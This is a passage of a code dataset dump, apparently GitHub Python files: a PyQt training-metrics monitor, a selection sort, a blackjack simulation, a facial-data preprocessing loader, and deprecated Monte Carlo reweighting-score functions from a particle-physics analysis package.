self.validation_accuracy_graph.getAxis(\"bottom\").setStyle(\n tickFont=font_tick, tickTextOffset=6\n )\n self.validation_loss_graph.getAxis(\"bottom\").setStyle(tickFont=font_tick, tickTextOffset=6)\n self.train_accuracy_graph.getAxis(\"left\").setStyle(tickFont=font_tick, tickTextOffset=6)\n self.train_loss_graph.getAxis(\"left\").setStyle(tickFont=font_tick, tickTextOffset=6)\n self.validation_accuracy_graph.getAxis(\"left\").setStyle(\n tickFont=font_tick, tickTextOffset=6\n )\n self.validation_loss_graph.getAxis(\"left\").setStyle(tickFont=font_tick, tickTextOffset=6)\n\n # Generate Data Indicator Group Box.\n self.groupbox_epoch = QGroupBox(\"Epoch\")\n self.groupbox_train_accuracy = QGroupBox(\"Train Accuracy\")\n self.groupbox_train_loss = QGroupBox(\"Train Loss\")\n 
self.groupbox_validation_accuracy = QGroupBox(\"Validation Accuracy\")\n self.groupbox_validation_loss = QGroupBox(\"Validation Loss\")\n\n # Generate Data Indicator Label.\n self.label_epoch = QLabel(\"0\", self)\n self.label_train_accuracy = QLabel(\"0\", self)\n self.label_train_loss = QLabel(\"0\", self)\n self.label_validation_accuracy = QLabel(\"0\", self)\n self.label_validation_loss = QLabel(\"0\", self)\n\n # Arrange Data Indicator central.\n self.label_epoch.setAlignment(Qt.AlignCenter)\n self.label_train_accuracy.setAlignment(Qt.AlignCenter)\n self.label_train_loss.setAlignment(Qt.AlignCenter)\n self.label_validation_accuracy.setAlignment(Qt.AlignCenter)\n self.label_validation_loss.setAlignment(Qt.AlignCenter)\n\n # Set background color and border of Data Indicator.\n self.label_epoch.setStyleSheet(\n \"color:rgb(0, 0, 0);\"\n \"background-color:rgb(250,250,250);\"\n \"border-style: solid;\"\n \"border-width: 1px;\"\n \"border-color: rgb(200,200,200);\"\n \"border-radius: 5px\"\n )\n self.label_train_accuracy.setStyleSheet(\n \"color:rgb(203, 26, 126);\"\n \"background-color:rgb(250,250,250);\"\n \"border-style: solid;\"\n \"border-width: 1px;\"\n \"border-color: rgb(200,200,200);\"\n \"border-radius: 5px\"\n )\n self.label_train_loss.setStyleSheet(\n \"color:rgb(203, 26, 126);\"\n \"background-color:rgb(250,250,250);\"\n \"border-style: solid;\"\n \"border-width: 1px;\"\n \"border-color: rgb(200,200,200);\"\n \"border-radius: 5px\"\n )\n self.label_validation_accuracy.setStyleSheet(\n \"color:rgb(44, 106, 180);\"\n \"background-color:rgb(250,250,250);\"\n \"border-style: solid;\"\n \"border-width: 1px;\"\n \"border-color: rgb(200,200,200);\"\n \"border-radius: 5px\"\n )\n self.label_validation_loss.setStyleSheet(\n \"color:rgb(44, 106, 180);\"\n \"background-color:rgb(250,250,250);\"\n \"border-style: solid;\"\n \"border-width: 1px;\"\n \"border-color: rgb(200,200,200);\"\n \"border-radius: 5px\"\n )\n\n # Vertically locate Group Box and Label.\n group_box1.addWidget(self.label_epoch)\n group_box2.addWidget(self.label_train_accuracy)\n group_box3.addWidget(self.label_train_loss)\n group_box4.addWidget(self.label_validation_accuracy)\n group_box5.addWidget(self.label_validation_loss)\n\n self.groupbox_epoch.setLayout(group_box1)\n self.groupbox_train_accuracy.setLayout(group_box2)\n self.groupbox_train_loss.setLayout(group_box3)\n self.groupbox_validation_accuracy.setLayout(group_box4)\n self.groupbox_validation_loss.setLayout(group_box5)\n\n # Group horizontally. 
(1 row: 2 Graphs), (2 row : 2 Graphs), (3 row : 10 Labels(Data Indicator))\n        hbox1.addWidget(self.train_accuracy_graph)\n        hbox1.addWidget(self.train_loss_graph)\n\n        hbox2.addWidget(self.validation_accuracy_graph)\n        hbox2.addWidget(self.validation_loss_graph)\n\n        hbox3.addWidget(self.groupbox_epoch)\n        hbox3.addWidget(self.groupbox_train_accuracy)\n        hbox3.addWidget(self.groupbox_train_loss)\n        hbox3.addWidget(self.groupbox_validation_accuracy)\n        hbox3.addWidget(self.groupbox_validation_loss)\n\n        # Group grouped widgets vertically.\n        vbox.addLayout(hbox1)\n        vbox.addLayout(hbox2)\n        vbox.addLayout(hbox3)\n\n        # Create window and arrange layout.\n        self.setLayout(vbox)\n        self.setGeometry(100, 100, 1300, 500)\n        self.setWindowTitle(\"Accuracy & Loss Monitoring\")\n\n        # Make range of axis x.\n        self.train_accuracy_graph.enableAutoRange(axis=\"x\")\n        self.train_loss_graph.enableAutoRange(axis=\"x\")\n        self.validation_accuracy_graph.enableAutoRange(axis=\"x\")\n        self.validation_loss_graph.enableAutoRange(axis=\"x\")\n\n        # Make range of axis y.\n        self.train_accuracy_graph.enableAutoRange(axis=\"y\")\n        self.train_loss_graph.enableAutoRange(axis=\"y\")\n        self.validation_accuracy_graph.enableAutoRange(axis=\"y\")\n        self.validation_loss_graph.enableAutoRange(axis=\"y\")\n\n        self.timer = QTimer()\n        self.timer.setInterval(1)\n        self.timer.timeout.connect(self.update)\n        self.timer.start()\n\n        self.show()\n\n    @pyqtSlot()\n    def update(self):\n        # Skip redrawing until the first metrics have arrived; otherwise\n        # the [-1] lookups below would raise IndexError on empty lists.\n        if not self.epoch:\n            return\n\n        self.train_accuracy_curve.setData(self.epoch, self.train_accuracy)\n        self.train_loss_curve.setData(self.epoch, self.train_loss)\n        self.validation_accuracy_curve.setData(self.epoch, self.validation_accuracy)\n        self.validation_loss_curve.setData(self.epoch, self.validation_loss)\n\n        self.label_epoch.setText(str(self.epoch[-1]))\n        self.label_train_accuracy.setText(str(self.train_accuracy[-1]))\n        self.label_train_loss.setText(str(self.train_loss[-1]))\n        self.label_validation_accuracy.setText(str(self.validation_accuracy[-1]))\n        self.label_validation_loss.setText(str(self.validation_loss[-1]))\n\n    def update_metrics(\n        self, epoch, train_accuracy, train_loss, validation_accuracy, validation_loss\n    ):\n        self.epoch = epoch\n        self.train_accuracy = train_accuracy\n        self.train_loss = train_loss\n        self.validation_accuracy = validation_accuracy\n        self.validation_loss = validation_loss\n\n\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n    ex = Main()\n    sys.exit(app.exec_())\n","repo_name":"james20140802/digit_recognizer","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":11460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38016036335","text":"# How it works: find the smallest value in the not-yet-sorted range, then swap it with the element at the head of that range; repeating this sorts the whole array\ndef selectionSort(arr):\n    if arr is None or len(arr) == 0:\n        return\n    for i in range(len(arr) - 1):\n        min_index = i\n        for j in range(i+1, len(arr)):\n            if arr[min_index] > arr[j]:\n                min_index = j\n        arr[min_index], arr[i] = arr[i], arr[min_index]\n\n\nif __name__ == '__main__':\n    array = [3, 5, 6, 1, 3, 7, 8, 34, 2, 9, 4]\n    selectionSort(array)\n    print(array)","repo_name":"szhmery/algorithms","sub_path":"sorting/SelectionSort.py","file_name":"SelectionSort.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29286405295","text":"import random\n\n\ndef main():\n    deck = create_deck()\n    points1 = 0\n    points2 = 0\n    while points1 < 21 and points2 < 21:\n        deck, points1 = deal(deck, points1)\n        deck, points2 
= deal(deck, points2)\n    print(f'first player {points1}\\n'\n          f'second player {points2}')\n\ndef create_deck():\n    deck = {'Ace of Spades': 11, '2 of Spades': 2, '3 of Spades': 3, '4 of Spades': 4, '5 of Spades': 5,\n            '6 of Spades': 6, '7 of Spades': 7, '8 of Spades': 8, '9 of Spades': 9, '10 of Spades': 10,\n            'Jack of Spades': 10, 'Queen of Spades': 10, 'King of Spades': 10,\n            'Ace of Hearts': 11, '2 of Hearts': 2, '3 of Hearts': 3, '4 of Hearts': 4, '5 of Hearts': 5,\n            '6 of Hearts': 6, '7 of Hearts': 7, '8 of Hearts': 8, '9 of Hearts': 9, '10 of Hearts': 10,\n            'Jack of Hearts': 10, 'Queen of Hearts': 10, 'King of Hearts': 10,\n            'Ace of Clubs': 11, '2 of Clubs': 2, '3 of Clubs': 3, '4 of Clubs': 4, '5 of Clubs': 5,\n            '6 of Clubs': 6, '7 of Clubs': 7, '8 of Clubs': 8, '9 of Clubs': 9, '10 of Clubs': 10,\n            'Jack of Clubs': 10, 'Queen of Clubs': 10, 'King of Clubs': 10,\n            'Ace of Diamonds': 11, '2 of Diamonds': 2, '3 of Diamonds': 3, '4 of Diamonds': 4, '5 of Diamonds': 5,\n            '6 of Diamonds': 6, '7 of Diamonds': 7, '8 of Diamonds': 8, '9 of Diamonds': 9, '10 of Diamonds': 10,\n            'Jack of Diamonds': 10, 'Queen of Diamonds': 10, 'King of Diamonds': 10}\n    return deck\n\n\ndef deal(deck, points):\n    card = random.choice(list(deck))\n    # An ace is worth 11, but only counts as 1 when adding 11 would bust the hand.\n    if points > 10 and deck.get(card) == 11:\n        points += 1\n    else:\n        points += deck.get(card)\n    deck.pop(card)\n    return deck, points\n\n\nmain()\n","repo_name":"lebrodequin/Starting_out_with_python-_5th_edition._Solutions","sub_path":"9/9. Blackjack Simulation.py","file_name":"9. Blackjack Simulation.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7097550141","text":"import os\nimport pickle\nimport cv2\nimport numpy as np\nimport scipy.fftpack as FFT\n\nnp.set_printoptions(suppress=True)\n\n\ndef dense_to_one_hot(labels_dense, num_classes):\n    \"\"\"Convert class labels from scalars to one-hot vectors.\"\"\"\n    labels_one_hot = []\n    for i in range(num_classes):\n        if i == labels_dense:\n            labels_one_hot.append(1)\n        else:\n            labels_one_hot.append(0)\n    return np.array(labels_one_hot)\n\n\ndef pickle_2_img_single(data_file):\n    '''load data from pkl'''\n\n    if not os.path.exists(data_file):\n        print('file {0} does not exist'.format(data_file))\n        exit()\n    with open(data_file, 'rb') as f:\n        data = pickle.load(f)\n    total_x1, total_y = [], []\n    for i in range(len(data)):\n        x1 = []\n        x2 = []\n        yl = []\n        print(len(data[i]['img']))\n        for j in range(len(data[i]['labels'])):\n            img = data[i]['img'][j]\n            img = FFT.dctn(img)\n            img_neu = data[i]['img_neu'][j]\n            img_neu = FFT.dctn(img_neu)\n            diff = img - img_neu\n            lms = data[i]['lms'][j]\n            lms = np.array(lms)\n            '''\n            img = data[i]['img'][j]\n            img_neu = data[i]['img_neu'][j]\n            diff = img - img_neu\n            diff = FFT.dctn(diff)\n            '''\n            label = int(data[i]['labels'][j])\n            if label == 7:\n                label = 2\n\n            #label = dense_to_one_hot(label, 6)\n\n            x1.append(lms)\n            yl.append(label)\n\n        total_x1.append(x1)\n        total_y.append(yl)\n\n    return total_x1, total_y\n","repo_name":"chency820/face_patch_mnn","sub_path":"PreProcessing_lms.py","file_name":"PreProcessing_lms.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28895542917","text":"# Python 2 backwards compatibility overhead START\n\"\"\"\nDEPRECATED! 
USE OTHER MODULES LIKE rd.data, rd.ml, rd.reweight, rd.score and rd.stat\n\nDEPRECATED!DEPRECATED!DEPRECATED!DEPRECATED!DEPRECATED!\n\n\"\"\"\n\n\nimport math as mt\n\nimport numpy as np\n\nfrom . import data_storage, dev_tool\n\n\ndef mayou_score(\n    mc_data, real_data, features=None, old_mc_weights=1, clf=\"xgb\", splits=2, n_folds=10\n):\n    \"\"\"An experimental score using a \"loss\" function for data-similarity\"\"\"\n    import raredecay.analysis.ml_analysis as ml_ana\n    from raredecay.globals_ import out\n\n    features = dev_tool.entries_to_str(features)\n    clf = dev_tool.entries_to_str(clf)\n\n    # initialize variables\n    output = {}\n    score_mc_vs_mcr = []\n    score_mcr_vs_real = []\n    # splits *= 2  # because every split is done with fold 0 and 1 (<- 2 *)\n\n    # loop over number of splits, split the mc data\n\n    mc_data.make_folds(n_folds)\n    real_data.make_folds(n_folds)\n\n    # mc reweighted vs mc\n    for fold in range(n_folds):\n        mc_data_train, mc_data_test = mc_data.get_fold(fold)\n        # TODO: no real folds? It is better to test on full data always?\n        # mc_data_train, mc_data_test = real_data.get_fold(fold)\n        for split in range(splits * 2):  # because two possibilities per split\n            if split % 2 == 0:\n                mc_data_train.make_folds(2)\n            mc_normal, mc_reweighted = mc_data_train.get_fold(split % 2)\n            mc_normal.set_weights(old_mc_weights)\n            score_mc_vs_mcr.append(\n                ml_ana.classify(\n                    original_data=mc_normal,\n                    target_data=mc_reweighted,\n                    features=features,\n                    validation=[mc_data_test, real_data],\n                    clf=clf,\n                    plot_importance=1,\n                    # TODO: no weights ratio? (roc auc)\n                    weights_ratio=0,\n                )[1]\n            )\n    out.add_output(\n        [\n            \"mayou_score mc vs mc reweighted test on mc vs real score: \",\n            score_mc_vs_mcr,\n            \"\\nMean: \",\n            np.mean(score_mc_vs_mcr),\n            \" +-\",\n            np.std(score_mc_vs_mcr) / mt.sqrt(len(score_mc_vs_mcr) - 1),\n        ],\n        subtitle=\"Mayou score\",\n        to_end=True,\n    )\n\n    output[\"mc_distance\"] = np.mean(score_mc_vs_mcr)\n\n    # mc_reweighted vs real\n    for fold in range(n_folds):\n        real_train, real_test = real_data.get_fold(fold)\n        mc_train, mc_test = mc_data.get_fold(fold)\n        mc_test.set_weights(old_mc_weights)\n        score_mcr_vs_real.append(\n            ml_ana.classify(\n                original_data=mc_train,\n                target_data=real_train,\n                features=features,\n                validation=[mc_test, real_test],\n                clf=clf,\n                plot_importance=1,\n                # TODO: no weights ratio? (roc auc)\n                weights_ratio=0,\n            )[1]\n        )\n\n    out.add_output(\n        [\n            \"mayou_score real vs mc reweighted test on mc vs real score: \",\n            score_mcr_vs_real,\n            \"\\nMean: \",\n            np.mean(score_mcr_vs_real),\n            \" +-\",\n            np.std(score_mcr_vs_real) / mt.sqrt(len(score_mcr_vs_real) - 1),\n        ],\n        to_end=True,\n    )\n\n    output[\"real_distance\"] = np.mean(score_mcr_vs_real)\n\n    return output\n\n\ndef train_similar(\n    mc_data,\n    real_data,\n    features=None,\n    n_checks=10,\n    n_folds=10,\n    clf=\"xgb\",\n    test_max=True,\n    test_shuffle=True,\n    test_mc=False,\n    old_mc_weights=1,\n    test_predictions=False,\n    clf_pred=\"rdf\",\n):\n    \"\"\"Score for reweighting. Train clf on mc reweighted/real, test on real; minimize score.\n\n    Enter two datasets and evaluate the score described below. Return a\n    dictionary containing the different scores. The test_predictions is\n    another scoring, which is built upon the train_similar method.\n\n    **Scoring method description**\n\n    **Idea**:\n    A clf is trained on the reweighted mc as well as on the real data of a\n    certain decay. Therefore, the classifier learns to distinguish between\n    Monte-Carlo data and real data. 
Then we let the classifier predict some\n    real data (an unbiased test set) and see how many it is able to classify\n    as real events. The lower the score, the fewer differences it was able to\n    learn from the train data, therefore the more similar the train data and\n    the better the reweighting.\n\n    **Advantages**: It is quite difficult to cheat on this method. Most of all\n    it is robust to single high-weight events (which mcreweighted_as_real is\n    not) and, in general, seems to be the best scoring so far.\n\n    **Disadvantages**: If you insert a gaussian shaped 1.0 as mc and a gaussian\n    shaped 1.1 as real, the score will be bad (around 0.33). So far, this was\n    only observed for \"artificial\" distributions (even though, of course, we\n    do not know whether it partly affects real distributions as well)\n\n    **Output explanation**\n\n    The return is a dictionary containing several values. Of course, only the\n    values that are set to be evaluated are contained. The keys are:\n\n    - '**score**' : The average of all train_similar scores (as we use KFolding,\n      there will be n_folds scores). *The* score.\n    - '**score_std**' : The std of a single score, just for curiosity\n    - '**score_max**' : The (average of all) \"maximum\" score. Actually the\n      train_similar score but\n      with mc instead of *reweighted* mc. Should be higher than the\n      reweighted score.\n    - '**score_max_std**' : The std of a single score, just for curiosity\n    - '**score_pred**' : The score of the test_predictions method.\n    - '**score_mc_pred**' : The score of the test_predictions method but on the\n      predictions of the mc instead of the *reweighted* mc.\n\n    Parameters\n    ----------\n    mc_data : |hepds_type|\n        The reweighted Monte-Carlo data, assuming the new weights are applied\n        already.\n    real_data : |hepds_type|\n        The real data\n    n_checks : int >= 1\n        Number of checks to perform. Has to be <= n_folds\n    n_folds : int > 1\n        Number of folds the data will be split into\n    clf : str\n        The name of a classifier to be used in\n        :py:func:`~raredecay.analysis.ml_analysis.classify`.\n    test_max : boolean\n        If true, test for the \"maximum value\" by training also on mc/real\n        (instead of *reweighted* mc/real)\n        and test on real. The score for only mc should be higher than for\n        reweighted mc/real. It *should* most probably be, but does not\n        have to be!\n    old_mc_weights : array-like or 1\n        If *test_max* is True, the weights for mc before reweighting will be\n        taken to be *old_mc_weights*, the weights the mc distribution had\n        before the reweighting. The default is 1.\n    test_predictions : boolean\n        If true, try to distinguish the predictions. Advanced feature and not\n        yet really discovered how to interpret. Gives very high ROC somehow.\n    clf_pred : str\n        The classifier to be used to distinguish the predictions. Required for\n        the *test_predictions*.\n\n    Return\n    ------\n    out : dict\n        A dictionary containing the different scores. See the description above.\n\n    \"\"\"\n    import raredecay.analysis.ml_analysis as ml_ana\n    from raredecay.globals_ import out\n\n    features = dev_tool.entries_to_str(features)\n    clf = dev_tool.entries_to_str(clf)\n    clf_pred = dev_tool.entries_to_str(clf_pred)\n\n    # initialize variables\n    assert (\n        1 <= n_checks <= n_folds and n_folds > 1\n    ), \"wrong n_checks/n_folds. 
Check the docs\"\n assert isinstance(mc_data, data_storage.HEPDataStorage), (\n \"mc_data wrong type:\" + str(type(mc_data)) + \", has to be HEPDataStorage\"\n )\n assert isinstance(real_data, data_storage.HEPDataStorage), (\n \"real_data wrong type:\" + str(type(real_data)) + \", has to be HEPDataStorage\"\n )\n # assert isinstance(clf, str),\\\n # \"clf has to be a string, the name of a valid classifier. Check the docs!\"\n\n output = {}\n\n scores = np.ones(n_checks)\n scores_shuffled = np.ones(n_checks)\n scores_mc = np.ones(n_checks)\n scores_max = np.ones(n_checks) # required due to output of loop\n scores_mc_max = np.ones(n_checks)\n # scores_weighted = []\n scores_max_weighted = []\n probas_mc = []\n probas_reweighted = []\n weights_mc = []\n weights_reweighted = []\n\n real_pred = []\n real_test_index = []\n real_mc_pred = []\n\n # initialize data\n tmp_mc_targets = mc_data.get_targets()\n mc_data.set_targets(0)\n real_data.make_folds(n_folds=n_folds)\n if test_mc:\n mc_data.make_folds(n_folds=n_folds)\n for fold in range(n_checks):\n real_train, real_test = real_data.get_fold(fold)\n if test_mc:\n mc_train, mc_test = mc_data.get_fold(fold)\n mc_test.set_targets(0)\n else:\n mc_train = mc_data.copy_storage()\n mc_train.set_targets(0)\n\n real_test.set_targets(1)\n real_train.set_targets(1)\n\n tmp_out = ml_ana.classify(\n mc_train,\n real_train,\n validation=real_test,\n clf=clf,\n plot_title=\"train on mc reweighted/real, test on real\",\n weights_ratio=1,\n get_predictions=True,\n features=features,\n plot_importance=1,\n importance=1,\n )\n clf_trained, scores[fold], pred_reweighted = tmp_out\n\n tmp_weights = mc_train.get_weights()\n\n if test_shuffle:\n import copy\n\n shuffled_weights = copy.deepcopy(tmp_weights)\n shuffled_weights.reindex(np.random.permutation(shuffled_weights.index))\n mc_train.set_weights(shuffled_weights)\n tmp_out = ml_ana.classify(\n mc_train,\n real_train,\n validation=real_test,\n clf=clf,\n plot_title=\"train on mc reweighted/real, test on real\",\n weights_ratio=1,\n get_predictions=True,\n features=features,\n plot_importance=1,\n importance=1,\n )\n scores_shuffled[fold] = tmp_out[1]\n mc_train.set_weights(tmp_weights)\n\n if test_mc:\n clf_trained, scores_mc[fold] = ml_ana.classify(\n validation=mc_test,\n clf=clf_trained,\n plot_title=\"train on mc reweighted/real, test on mc\",\n weights_ratio=1,\n get_predictions=False,\n features=features,\n plot_importance=1,\n importance=1,\n )\n\n # del clf_trained, tmp_pred\n probas_reweighted.append(pred_reweighted[\"y_proba\"])\n weights_reweighted.append(pred_reweighted[\"weights\"])\n\n real_pred.extend(pred_reweighted[\"y_pred\"])\n real_test_index.extend(real_test.get_index())\n\n if test_max:\n temp_weights = mc_data.get_weights()\n mc_data.set_weights(old_mc_weights)\n tmp_out = ml_ana.classify(\n mc_data,\n real_train,\n validation=real_test,\n plot_title=\"real/mc NOT reweight trained, validate on real\",\n weights_ratio=1,\n get_predictions=True,\n clf=clf,\n features=features,\n plot_importance=1,\n importance=1,\n )\n clf_trained, scores_max[fold], pred_mc = tmp_out\n if test_mc:\n clf_trained, scores_mc_max[fold] = ml_ana.classify(\n validation=mc_test,\n clf=clf_trained,\n plot_title=\"train on mc NOT reweighted/real, test on mc\",\n weights_ratio=1,\n get_predictions=False,\n features=features,\n plot_importance=1,\n importance=1,\n )\n del clf_trained\n # HACK\n tmp_pred = pred_mc[\"y_proba\"][:, 1] * pred_mc[\"weights\"]\n scores_max_weighted.extend(tmp_pred * (pred_mc[\"y_true\"] * 2 - 
1))\n\n            # HACK END\n            mc_data.set_weights(temp_weights)\n            probas_mc.append(pred_mc[\"y_proba\"])\n            weights_mc.append(pred_mc[\"weights\"])\n\n            real_mc_pred.extend(pred_mc[\"y_pred\"])\n\n    output[\"score\"] = np.round(scores.mean(), 4)\n    output[\"score_std\"] = np.round(scores.std(), 4)\n\n    if test_shuffle:\n        output[\"score_shuffled\"] = np.round(scores_shuffled.mean(), 4)\n        output[\"score_shuffled_std\"] = np.round(scores_shuffled.std(), 4)\n\n    if test_mc:\n        output[\"score_mc\"] = np.round(scores_mc.mean(), 4)\n        output[\"score_mc_std\"] = np.round(scores_mc.std(), 4)\n\n    out.add_output(\n        [\n            \"Score train_similar (recall, lower means better): \",\n            str(output[\"score\"]) + \" +- \" + str(output[\"score_std\"]),\n        ],\n        subtitle=\"Clf trained on real/mc reweight, tested on real\",\n    )\n    if test_max:\n        output[\"score_max\"] = np.round(scores_max.mean(), 4)\n        output[\"score_max_std\"] = np.round(scores_max.std(), 4)\n        if test_mc:\n            output[\"score_mc_max\"] = np.round(scores_mc_max.mean(), 4)\n            output[\"score_mc_max_std\"] = np.round(scores_mc_max.std(), 4)\n        out.add_output([\"No reweighting score: \", round(output[\"score_max\"], 4)])\n\n    if test_predictions:\n        # test on the reweighted/real predictions\n        real_data.set_targets(targets=real_pred, index=real_test_index)\n        tmp_, score_pred = ml_ana.classify(\n            real_data,\n            target_from_data=True,\n            clf=clf_pred,\n            features=features,\n            plot_title=\"train on predictions reweighted/real, real as target\",\n            weights_ratio=1,\n            validation=n_checks,\n            plot_importance=3,\n        )\n        output[\"score_pred\"] = round(score_pred, 4)\n\n    if test_predictions and test_max:\n        # test on the mc/real predictions\n        real_data.set_targets(targets=real_mc_pred, index=real_test_index)\n        tmp_, score_mc_pred = ml_ana.classify(\n            real_data,\n            target_from_data=True,\n            clf=clf_pred,\n            validation=n_checks,\n            plot_title=\"mc not rew/real pred, real as target\",\n            weights_ratio=1,\n            plot_importance=3,\n        )\n        output[\"score_mc_pred\"] = np.round(score_mc_pred, 4)\n\n    mc_data.set_targets(tmp_mc_targets)\n\n    output[\"similar_dist\"] = similar_dist(\n        predictions=np.concatenate(probas_reweighted)[:, 1],\n        weights=np.concatenate(weights_reweighted),\n    )\n\n    return output\n\n\ndef estimate_weights_bias(mc, real, columns=None, n_folds=10, clf=\"xgb\"):\n    pass\n\n\ndef train_similar_new(\n    mc,\n    real,\n    columns=None,\n    n_checks=10,\n    n_folds=10,\n    clf=\"xgb\",\n    test_max=True,\n    test_shuffle=True,\n    test_mc=False,\n    old_mc_weights=1,\n    test_predictions=False,\n    clf_pred=\"rdf\",\n):\n    \"\"\"Score for reweighting. Train clf on mc reweighted/real, test on real; minimize score.\n\n    Enter two datasets and evaluate the score described below. Return a\n    dictionary containing the different scores. The test_predictions is\n    another scoring, which is built upon the train_similar method.\n\n    **Scoring method description**\n\n    **Idea**:\n    A clf is trained on the reweighted mc as well as on the real data of a\n    certain decay. Therefore, the classifier learns to distinguish between\n    Monte-Carlo data and real data. Then we let the classifier predict some\n    real data (an unbiased test set) and see how many it is able to classify\n    as real events. The lower the score, the fewer differences it was able to\n    learn from the train data, therefore the more similar the train data and\n    the better the reweighting.\n\n    **Advantages**: It is quite difficult to cheat on this method. 
Most of all\n    it is robust to single high-weight events (which mcreweighted_as_real is\n    not) and, in general, seems to be the best scoring so far.\n\n    **Disadvantages**: If you insert a gaussian shaped 1.0 as mc and a gaussian\n    shaped 1.1 as real, the score will be bad (around 0.33). So far, this was\n    only observed for \"artificial\" distributions (even though, of course, we\n    do not know whether it partly affects real distributions as well)\n\n    **Output explanation**\n\n    The return is a dictionary containing several values. Of course, only the\n    values that are set to be evaluated are contained. The keys are:\n\n    - '**score**' : The average of all train_similar scores (as we use KFolding,\n      there will be n_folds scores). *The* score.\n    - '**score_std**' : The std of a single score, just for curiosity\n    - '**score_max**' : The (average of all) \"maximum\" score. Actually the\n      train_similar score but\n      with mc instead of *reweighted* mc. Should be higher than the\n      reweighted score.\n    - '**score_max_std**' : The std of a single score, just for curiosity\n    - '**score_pred**' : The score of the test_predictions method.\n    - '**score_mc_pred**' : The score of the test_predictions method but on the\n      predictions of the mc instead of the *reweighted* mc.\n\n    Parameters\n    ----------\n    mc : |hepds_type|\n        The reweighted Monte-Carlo data, assuming the new weights are applied\n        already.\n    real : |hepds_type|\n        The real data\n    n_checks : int >= 1\n        Number of checks to perform. Has to be <= n_folds\n    n_folds : int > 1\n        Number of folds the data will be split into\n    clf : str\n        The name of a classifier to be used in\n        :py:func:`~raredecay.analysis.ml_analysis.classify`.\n    test_max : boolean\n        If true, test for the \"maximum value\" by training also on mc/real\n        (instead of *reweighted* mc/real)\n        and test on real. The score for only mc should be higher than for\n        reweighted mc/real. It *should* most probably be, but does not\n        have to be!\n    old_mc_weights : array-like or 1\n        If *test_max* is True, the weights for mc before reweighting will be\n        taken to be *old_mc_weights*, the weights the mc distribution had\n        before the reweighting. The default is 1.\n    test_predictions : boolean\n        If true, try to distinguish the predictions. Advanced feature and not\n        yet really discovered how to interpret. Gives very high ROC somehow.\n    clf_pred : str\n        The classifier to be used to distinguish the predictions. Required for\n        the *test_predictions*.\n\n    Return\n    ------\n    out : dict\n        A dictionary containing the different scores. See the description above.\n\n    \"\"\"\n    import raredecay.analysis.ml_analysis as ml_ana\n    from raredecay.analysis import statistics\n    from raredecay.tools.data_storage import HEPDataStorage\n\n    # Python 2/3 compatibility, str\n    columns = dev_tool.entries_to_str(columns)\n    clf = dev_tool.entries_to_str(clf)\n    clf_pred = dev_tool.entries_to_str(clf_pred)\n\n    # initialize variables\n    assert (\n        1 <= n_checks <= n_folds and n_folds > 1\n    ), \"wrong n_checks/n_folds. Check the docs\"\n    assert isinstance(mc, data_storage.HEPDataStorage), (\n        \"mc_data wrong type:\" + str(type(mc)) + \", has to be HEPDataStorage\"\n    )\n    assert isinstance(real, data_storage.HEPDataStorage), (\n        \"real_data wrong type:\" + str(type(real)) + \", has to be HEPDataStorage\"\n    )\n    # assert isinstance(clf, str),\\\n    # \"clf has to be a string, the name of a valid classifier. 
Check the docs!\"\n\n output = {}\n\n predictions = []\n predictions_weights = []\n predictions_max = []\n predictions_max_weights = []\n predictions_min = []\n predictions_min_weights = []\n\n # initialize data\n tmp_mc_targets = mc.get_targets()\n mc.set_targets(0)\n real.make_folds(n_folds=n_folds)\n\n for fold in range(n_checks):\n real_train, real_test = real.get_fold(fold)\n mc_train = mc.copy_storage()\n mc_train.set_targets(0)\n real_test.set_targets(1)\n real_train.set_targets(1)\n\n tmp_out = ml_ana.classify(\n mc_train,\n real_train,\n validation=real_test,\n clf=clf,\n plot_title=\"train on mc reweighted/real, test on real\",\n weights_ratio=1,\n get_predictions=True,\n features=columns,\n plot_importance=1,\n importance=1,\n )\n clf_trained, _, pred = tmp_out\n\n predictions.append(pred[\"y_proba\"][:, 1])\n predictions_weights.append(pred[\"weights\"])\n\n temp_weights = mc_train.weights\n mc_train.set_weights(old_mc_weights)\n tmp_out = ml_ana.classify(\n original_data=mc_train,\n target_data=real_train,\n validation=real_test,\n plot_title=\"real/mc NOT reweight trained, validate on real\",\n weights_ratio=1,\n get_predictions=True,\n clf=clf,\n features=columns,\n plot_importance=1,\n importance=1,\n )\n clf_trained, _, pred = tmp_out\n predictions_max.append(pred[\"y_proba\"][:, 1])\n predictions_max_weights.append(pred[\"weights\"])\n mc_train.set_weights(temp_weights)\n\n predictions = np.concatenate(predictions)\n predictions_weights = np.concatenate(predictions_weights)\n predictions_max = np.concatenate(predictions_max)\n predictions_max_weights = np.concatenate(predictions_max_weights)\n\n # mix mc and real to get a nice shape of two similar dists\n # TODO: commented below out\n mc.set_weights(old_mc_weights)\n mc.make_folds(2)\n real.make_folds(2)\n mc1, mc2 = mc.get_fold(0)\n real1, real2 = real.get_fold(0)\n\n data1, target1, weights1 = mc1.make_dataset(real1)\n data2, target2, weights2 = mc2.make_dataset(real2)\n\n data1 = HEPDataStorage(data=data1, sample_weights=weights1, target=0)\n data2 = HEPDataStorage(data=data2, sample_weights=weights2, target=1)\n\n tmp_out = ml_ana.classify(\n original_data=data1,\n target_data=data2,\n validation=n_folds,\n plot_title=\"real/mc mixed\",\n weights_ratio=1,\n get_predictions=True,\n clf=clf,\n features=columns,\n plot_importance=1,\n importance=1,\n )\n clf_trained, _, pred = tmp_out\n predictions_min = np.array(pred[\"y_proba\"][:, 1])\n predictions_min_weights = np.array(pred[\"weights\"])\n\n mc.set_weights(temp_weights)\n mc.set_targets(tmp_mc_targets)\n\n # HACK\n import matplotlib.pyplot as plt\n\n n_bins = 20\n plt.figure(\"comparing the predictions\")\n plt.hist(predictions, alpha=0.3, label=\"predictions\", bins=n_bins, density=1)\n plt.hist(\n predictions_min, alpha=0.3, label=\"predictions_min\", bins=n_bins, density=1\n )\n plt.hist(\n predictions_max, alpha=0.3, label=\"predictions_max\", bins=n_bins, density=1\n )\n plt.legend()\n # plt.autoscale()\n\n 